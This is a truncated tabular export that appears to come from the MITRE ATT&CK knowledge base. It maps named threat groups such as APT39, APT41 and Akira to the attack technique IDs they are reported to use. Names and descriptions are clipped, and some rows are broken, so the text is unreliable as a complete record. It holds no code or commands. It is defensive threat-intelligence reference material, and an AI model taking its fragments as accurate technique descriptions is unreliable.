G0082 APT38 intrusion- group uses T1070.006Timestompattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1588.002Tool attack-pat technique [APT38](htt
G0082 APT38 intrusion- group uses T1565.002Transmitteattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1059.005Visual Basiattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1071.001Web Protocattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1505.003Web Shell attack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1059.003Windows Cattack-pat technique [APT38](ht
G0082 APT38 intrusion- group uses T1543.003Windows Se attack-pat technique [APT38](ht
G0087 APT39 intrusion- group uses T1546.010AppInit DL attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1560.001Archive viaattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1059.010AutoHotKey attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1197 BITS Jobs attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1102.002Bidirectio attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1110 Brute Forc attack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1115 Clipboard attack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1553.006Code Signinattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1059 Command attack-pat
an technique [APT39](htt
G0087 APT39 intrusion- group uses T1555 Credential attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1071.004DNS attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1005 Data from attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1140 Deobfuscatattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1027.013Encrypted/attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1041 Exfiltratio attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1190 Exploit Pubattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1090.002External Prattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1070.004File Deleti attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1083 File and Di attack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1056 Input Capt attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1090.001Internal Prattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1056.001Keyloggingattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1003.001LSASS Memattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1136.001Local Acco attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1074.001Local Data attack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1204.002Malicious Fattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1204.001Malicious Lattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1036.005Match Legiattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1046 Network Seattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1135 Network Shattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1003 OS Credentattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1059.001PowerShellattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1059.006Python attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1012 Query Regiattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1547.001Registry Ruattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1021.001Remote Des attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1018 Remote Sysattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1021.002SMB/Windo attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1021.004SSH attack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1053.005Scheduled attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1113 Screen Capattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1569.002Service Ex attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1547.009Shortcut Mattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1027.002Software Pattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1566.001Spearphishattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1566.002Spearphishattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1033 System Own attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1588.002Tool attack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1078 Valid Acco attack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1059.005Visual Basiattack-pat technique [APT39](htt
G0087 APT39 intrusion- group uses T1071.001Web Protocattack-pat technique [APT39](ht
G0087 APT39 intrusion- group uses T1505.003Web Shell attack-pat technique [APT39](ht
G0096 APT41 intrusion- group uses T1546.008Accessibili attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1098.007Additional attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1560.001Archive viaattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1197 BITS Jobs attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1037 Boot or Logattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1542.003Bootkit attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1110 Brute Forc attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1070.003Clear Comm attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1070.001Clear Windattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1213.003Code Reposattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1553.002Code Signi attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1218.001Compiled Hattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1195.002Compromise attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1496.001Compute Hiattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1555 Credential attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1555.003Credential attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1574.001DLL Searchattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1574.002DLL Side-L attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1071.004DNS attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1486 Data Encryattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1030 Data Transfattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1005 Data from attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1102.001Dead Dropattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1087.002Domain Acattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1568.002Domain Gen attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1574.006Dynamic Liattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1480.001Environmen attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1190 Exploit Pubattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1203 Exploitatioattack-pat technique [APT41](ht
[APT41](https://attack.mitre.
G0096 APT41 intrusion- group uses T1133 External R attack-pat technique
G0096 APT41 intrusion- group uses T1008 Fallback C attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1070.004File Deleti attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1071.002File Transf attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1083 File and Di attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1484.001Group Poliattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1656 Impersonatattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1562.006Indicator Battack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1105 Ingress Tooattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1056.001Keyloggingattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1003.001LSASS Memattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1570 Lateral Tooattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1087.001Local Acco attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1136.001Local Acco attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1036.004Masquerade attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1036.005Match Legiattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1112 Modify Regattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1104 Multi-Stag attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1003.003NTDS attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1599 Network Boattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1046 Network Seattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1135 Network Shattack-pat technique [APT41](h
G0096 APT41 intrusion- group uses T1027 Obfuscatedattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1550.002Pass the H attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1069 Permissionattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1059.001PowerShellattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1055 Process Injattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1090 Proxy attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1012 Query Regiattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1547.001Registry Ruattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1021.001Remote Des attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1018 Remote Sysattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1014 Rootkit attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1218.011Rundll32 attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1021.002SMB/Windo attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1596.005Scan Databattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1053.005Scheduled attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1003.002Security A attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1569.002Service Ex attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1027.002Software Pattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1566.001Spearphishattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1082 System Inf attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1016 System Netattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1049 System Netattack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1033 System Own attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1588.002Tool attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1059.004Unix Shell attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1078 Valid Acco attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1595.002Vulnerabiliattack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1071.001Web Protocattack-pat technique [APT41](ht
[APT41](https://attack.mitre.
G0096 APT41 intrusion- group uses T1059.003Windows Cattack-pat technique [APT41](https://attack.mitre.
G0096 APT41 intrusion- group uses T1047 Windows M attack-pat technique [APT41](ht
G0096 APT41 intrusion- group uses T1543.003Windows Se attack-pat technique [APT41](htt
G0096 APT41 intrusion- group uses T1595.003Wordlist S attack-pat technique [APT41](htt
G1023 APT5 intrusion- group uses T1098.007Additional attack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1560.001Archive viaattack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1070.003Clear Comm attack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1078.004Cloud Accoattack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1554 Compromise attack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1053.003Cron attack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1078.002Domain Acattack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1190 Exploit Pubattack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1070.004File Deleti attack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1083 File and Di attack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1562.006Indicator Battack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1070 Indicator attack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1056.001Keyloggingattack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1003.001LSASS Memattack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1136.001Local Acco attack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1074.001Local Data attack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1654 Log Enumerattack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1036.005Match Legiattack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1059.001PowerShellattack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1057 Process Di attack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1055 Process Injattack-pat technique [APT5](http
G1023 APT5 intrusion- group uses T1021.001Remote Des attack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1021.004SSH attack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1003.002Security A attack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1049 System Netattack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1070.006Timestompattack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1505.003Web Shell attack-pat technique [APT5](htt
G1023 APT5 intrusion- group uses T1059.003Windows Cattack-pat technique [APT5](htt
G1030 Agrius intrusion- group uses T1583 Acquire Infattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1560.001Archive viaattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1119 Automatedattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1110 Brute Forc attack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1005 Data from attack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1140 Deobfuscatattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1562.001Disable or attack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1078.002Domain Acattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1041 Exfiltratio attack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1190 Exploit Pubattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1003.001LSASS Memattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1570 Lateral Tooattack-pat technique [Agrius](h
G1030 Agrius intrusion- group uses T1074.001Local Data attack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1036 Masqueradattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1046 Network Seattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1110.003Password Sattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1021.001Remote Des attack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1018 Remote Sysattack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1003.002Security A attack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1505.003Web Shell attack-pat technique [Agrius](ht
G1030 Agrius intrusion- group uses T1059.003Windows Cattack-pat technique [Agrius](h
G1030 Agrius intrusion- group uses T1543.003Windows Se attack-pat technique [Agrius](ht
G0130 Ajax Secur intrusion- group uses T1555.003Credential attack-pat technique [Ajax Secu
G0130 Ajax Secur intrusion- group uses T1105 Ingress Tooattack-pat technique [Ajax Secu
G0130 Ajax Secur intrusion- group uses T1056.001Keyloggingattack-pat technique [Ajax Secu
G0130 Ajax Secur intrusion- group uses T1204.002Malicious Fattack-pat technique [Ajax Secur
G0130 Ajax Secur intrusion- group uses T1566.001Spearphishattack-pat technique [Ajax Secur
G0130 Ajax Secur intrusion- group uses T1566.003Spearphishiattack-pat technique [Ajax Secur
G1024 Akira intrusion- group uses T1531 Account Acattack-pat technique [Akira](htt
G1024 Akira intrusion- group uses T1560.001Archive viaattack-pat technique [Akira](htt
G1024 Akira intrusion- group uses T1486 Data Encryattack-pat technique [Akira](htt
G1024 Akira intrusion- group uses T1482 Domain Truattack-pat technique [Akira](htt
G1024 Akira intrusion- group uses T1567.002Exfiltratio attack-pat technique [Akira](htt
G1024 Akira intrusion- group uses T1133 External R attack-pat technique [Akira](ht
G1024 Akira intrusion- group uses T1657 Financial Tattack-pat technique [Akira](htt
G1024 Akira intrusion- group uses T1219 Remote Accattack-pat technique [Akira](htt
G1024 Akira intrusion- group uses T1018 Remote Sysattack-pat technique [Akira](htt
G1024 Akira intrusion- group uses T1213.002Sharepointattack-pat technique [Akira](htt
G1024 Akira intrusion- group uses T1078 Valid Acco attack-pat technique [Akira](htt
G0138 Andariel intrusion- group uses T1005 Data from attack-pat technique [Andariel](
G0138 Andariel intrusion- group uses T1189 Drive-by C attack-pat technique [Andariel](
G0138 Andariel intrusion- group uses T1203 Exploitatioattack-pat technique [Andariel](
G0138 Andariel intrusion- group uses T1590.005IP Address attack-pat technique [Andariel](
G0138 Andariel intrusion- group uses T1105 Ingress Tooattack-pat technique [Andariel]
G0138 Andariel intrusion- group uses T1204.002Malicious Fattack-pat technique [Andariel](
G0138 Andariel intrusion- group uses T1588.001Malware attack-pat technique [Andariel](
G0138 Andariel intrusion- group uses T1057 Process Di attack-pat technique [Andariel](
G0138 Andariel intrusion- group uses T1592.002Software attack-pat technique [Andariel](
G0138 Andariel intrusion- group uses T1566.001Spearphishattack-pat technique [Andariel]
G0138 Andariel intrusion- group uses T1027.003Steganogr attack-pat technique [Andariel](
G0138 Andariel intrusion- group uses T1049 System Netattack-pat technique [Andariel]
G1007 Aoqin Dra intrusion- group uses T1203 Exploitatioattack-pat technique [Aoqin Dra
G1007 Aoqin Dra intrusion- group uses T1083 File and Di attack-pat technique [Aoqin Drag
G1007 Aoqin Dra intrusion- group uses T1570 Lateral Tooattack-pat technique [Aoqin Dra
G1007 Aoqin Dra intrusion- group uses T1204.002Malicious Fattack-pat technique [Aoqin Drag
G1007 Aoqin Dra intrusion- group uses T1587.001Malware attack-pat technique [Aoqin Dra
G1007 Aoqin Dra intrusion- group uses T1036.005Match Legiattack-pat technique [Aoqin Drag
G1007 Aoqin Dra intrusion- group uses T1091 Replicatio attack-pat technique [Aoqin Dra
G1007 Aoqin Dra intrusion- group uses T1027.002Software Pattack-pat technique [Aoqin Dra
G1007 Aoqin Dra intrusion- group uses T1588.002Tool attack-pat technique [Aoqin Drag
G0143 Aquatic Paintrusion- group uses T1087 Account Diattack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1560.001Archive viaattack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1070.003Clear Comm attack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1070.001Clear Windattack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1027.010Command aOttack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1574.001DLL Searchattack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1005 Data from attack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1562.001Disable or attack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1078.002Domain Acattack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1574.006Dynamic Liattack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1070.004File Deleti attack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1105 Ingress Tooattack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1003.001LSASS Memattack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1654 Log Enumerattack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1588.001Malware attack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1036.004Masquerade attack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1036.005Match Legiattack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1112 Modify Regattack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1550.002Pass the H attack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1059.001PowerShellattack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1021.001Remote Des attack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1021 Remote Serattack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1218.011Rundll32 attack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1021.002SMB/Windo attack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1021.004SSH attack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1518.001Security S attack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1082 System Inf attack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1033 System Own attack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1007 System Serattack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1588.002Tool attack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1059.004Unix Shell attack-pat technique [Aquatic Pa
G0143 Aquatic Paintrusion- group uses T1595.002Vulnerabiliattack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1059.003Windows Cattack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1047 Windows M attack-pat technique [Aquatic P
G0143 Aquatic Paintrusion- group uses T1543.003Windows Se attack-pat technique [Aquatic P
G0001 Axiom intrusion- group uses T1546.008Accessibili attack-pat technique [Axiom](htt
G0001 Axiom intrusion- group uses T1560 Archive Coattack-pat technique [Axiom](htt
G0001 Axiom intrusion- group uses T1584.005Botnet attack-pat technique [Axiom](ht
G0001 Axiom intrusion- group uses T1583.002DNS Serverattack-pat technique [Axiom](htt
G0001 Axiom intrusion- group uses T1005 Data from attack-pat technique [Axiom](ht
G0001 Axiom intrusion- group uses T1189 Drive-by C attack-pat technique [Axiom](htt
G0001 Axiom intrusion- group uses T1190 Exploit Pubattack-pat technique [Axiom](htt
G0001 Axiom intrusion- group uses T1203 Exploitatioattack-pat technique [Axiom](ht
G0001 Axiom intrusion- group uses T1003 OS Credentattack-pat technique [Axiom](ht
G0001 Axiom intrusion- group uses T1566 Phishing attack-pat technique [Axiom](htt
G0001 Axiom intrusion- group uses T1563.002RDP Hijackattack-pat technique [Axiom](htt
G0001 Axiom intrusion- group uses T1021.001Remote Des attack-pat technique [Axiom](ht
G0001 Axiom intrusion- group uses T1001.002Steganogr attack-pat technique [Axiom](ht
G0001 Axiom intrusion- group uses T1553 Subvert Truattack-pat technique [Axiom](htt
G0001 Axiom intrusion- group uses T1078 Valid Acco attack-pat technique [Axiom](htt
G0001 Axiom intrusion- group uses T1583.003Virtual Pri attack-pat technique [Axiom](htt
G1002 BITTER intrusion- group uses T1583.001Domains attack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1559.002Dynamic Daattack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1568 Dynamic Reattack-pat technique [BITTER](h
G1002 BITTER intrusion- group uses T1573 Encrypted attack-pat technique [BITTER](h
G1002 BITTER intrusion- group uses T1027.013Encrypted/attack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1203 Exploitatioattack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1068 Exploitatioattack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1105 Ingress Tooattack-pat technique [BITTER](h
G1002 BITTER intrusion- group uses T1204.002Malicious Fattack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1036.004Masquerade attack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1095 Non-Applicattack-pat technique [BITTER](h
G1002 BITTER intrusion- group uses T1053.005Scheduled attack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1566.001Spearphishattack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1588.002Tool attack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1608.001Upload Maattack-pat technique [BITTER](ht
G1002 BITTER intrusion- group uses T1071.001Web Protocattack-pat technique [BITTER](ht
G0060 BRONZE BUintrusion- group uses T1560.001Archive viaattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1053.002At attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1027.001Binary Padattack-pat technique [BRONZE BUT
G0060 BRONZE BUintrusion- group uses T1548.002Bypass Useattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1574.002DLL Side-L attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1005 Data from attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1039 Data from attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1102.001Dead Dropattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1140 Deobfuscatattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1562.001Disable or attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1087.002Domain Acattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1189 Drive-by C attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1203 Exploitatioattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1070.004File Deleti attack-pat technique The [BRONZ
G0060 BRONZE BUintrusion- group uses T1083 File and Di attack-pat technique [BRONZE BUT
G0060 BRONZE BUintrusion- group uses T1105 Ingress Tooattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1003.001LSASS Memattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1204.002Malicious Fattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1036 Masqueradattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1036.005Match Legiattack-pat technique [BRONZE BUT
G0060 BRONZE BUintrusion- group uses T1550.003Pass the Tiattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1059.001PowerShellattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1059.006Python attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1547.001Registry Ruattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1018 Remote Sysattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1036.002Right-to-Leattack-pat technique [BRONZE BUT
G0060 BRONZE BUintrusion- group uses T1053.005Scheduled attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1113 Screen Capattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1518 Software Dattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1566.001Spearphishattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1132.001Standard Eattack-pat technique Several [B
G0060 BRONZE BUintrusion- group uses T1027.003Steganogr attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1573.001Symmetric attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1007 System Serattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1124 System Timattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1080 Taint Shar attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1588.002Tool attack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1059.005Visual Basiattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1071.001Web Protocattack-pat technique [BRONZE BU
G0060 BRONZE BUintrusion- group uses T1059.003Windows Cattack-pat technique [BRONZE BU
G0135 BackdoorDintrusion- group uses T1574.001DLL Searchattack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1055.001Dynamic-linattack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1190 Exploit Pubattack-pat technique [BackdoorDi
G0135 BackdoorDintrusion- group uses T1105 Ingress Tooattack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1074.001Local Data attack-pat technique [BackdoorDi
G0135 BackdoorDintrusion- group uses T1588.001Malware attack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1036.004Masquerade attack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1036.005Match Legiattack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1046 Network Seattack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1095 Non-Applicattack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1027 Obfuscatedattack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1120 Peripheral attack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1049 System Netattack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1588.002Tool attack-pat technique [BackdoorD
G0135 BackdoorDintrusion- group uses T1505.003Web Shell attack-pat technique [BackdoorDi
G0063 BlackOasisintrusion- group uses T1027 Obfuscatedattack-pat technique [BlackOasis
G0098 BlackTech intrusion- group uses T1588.003Code Signinattack-pat technique [BlackTech]
